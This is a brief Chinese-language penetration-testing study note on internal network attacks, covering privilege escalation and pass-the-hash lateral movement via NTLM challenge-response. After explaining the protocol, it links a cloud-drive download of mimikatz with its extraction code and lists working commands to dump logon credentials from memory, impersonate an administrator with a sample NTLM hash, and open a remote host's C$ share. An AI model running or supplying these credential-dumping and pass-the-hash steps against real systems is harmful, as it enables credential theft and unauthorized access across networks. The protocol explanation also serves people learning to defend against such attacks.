内网渗透
流程
1.提权
实际情况下拿到的用户一般为程序用户
大部分提权是基于溢出漏洞的提权(缓冲区溢出)
2.横向移动
手段:哈希传递
哈希传递
NTLM
NTLMhash
使用NTLM(NT LAN Manager)算法对用户密码进行哈希处理得到 NTLMhash
NTLM 协议
用于远程登录认证
NTLM 认证流程
-
client 将账户名传递到 server
-
server 判断本地账户名是否存在,没有则失败
如果存在,生成 challenge,查找 user 对应的 NTLM 哈希,使用哈希加密 challenge,生成一个 net-NTLM,存储在内存中,并将 challenge 发送给 client(挑战-应答机制)
-
client 接收到 challenge 后,将自己的密码转换为 NTLMhash,用NTLMhash 加密 challenge,生成 response,将 response 发送给 server
-
server 比较 net-NTLM 和 response 是否相同,相同则登陆成功,否则登陆失败
哈希传递攻击
hash 传递攻击成功的前提:要攻击的主机和失陷的主机密码相同
情景
-
攻陷了一台主机后抓不到该主机的明文密码
-
失陷主机和局域网内其他主机存在相同密码
攻击原理
攻击者猜测要攻击的主机和失陷主机的密码相同(并且需要发送正确的账户名请求),server 验证用户名正确后返回 challenge,使用失陷主机的 NTLMhash 加密接收到的 challenge,返回给 server,如果 server 上用户的密码和失陷主机上的用户密码相同,则可以成功登录
攻击程序
mimikatz 猕猴桃
链接:https://pan.baidu.com/s/1Iz1pt3-eiuAV4S0wQMOVVA?pwd=9mfs
提取码:9mfs
前提:成功提权
privilege::debug 提升权限(注:需以管理员权限运行)
sekurlsa::logonpasswords 获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:test.com /ntlm:a803cf45d87009c404eb89df4b1ae94c
弹出新窗口
dir \\10.10.10.254\c$
pth:Pass the hash 哈希传递
自动扫描内网存活的主机,自动对存活主机进行哈希传递